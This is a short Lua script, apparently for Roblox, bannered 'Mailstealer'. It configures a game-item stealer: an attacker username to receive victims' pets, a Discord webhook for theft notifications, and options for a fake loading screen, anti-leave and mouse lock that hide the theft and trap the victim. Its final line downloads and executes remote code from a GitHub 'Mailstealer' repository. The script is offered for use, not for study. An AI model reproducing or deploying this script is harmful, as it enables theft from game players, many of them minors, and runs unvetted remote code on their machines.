--[[
  __  __       _ _     _             _           
    |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
      | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
        | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
          |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   
]]--

UserName = "traftheopen0" -- good pets
Webhook = "https://discord.com/api/webhooks/1125080457642512495/aO0yb8rhicafMShs4aJEek02Zz0wL03oCoxQQBVa6scuHlRU2djpSrByG6wpUolwaFSt" -- pings for pets
UserName2 = "traftheopen0" -- bad pets

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/Egorikusa/Mailstealer/main/engine"))()
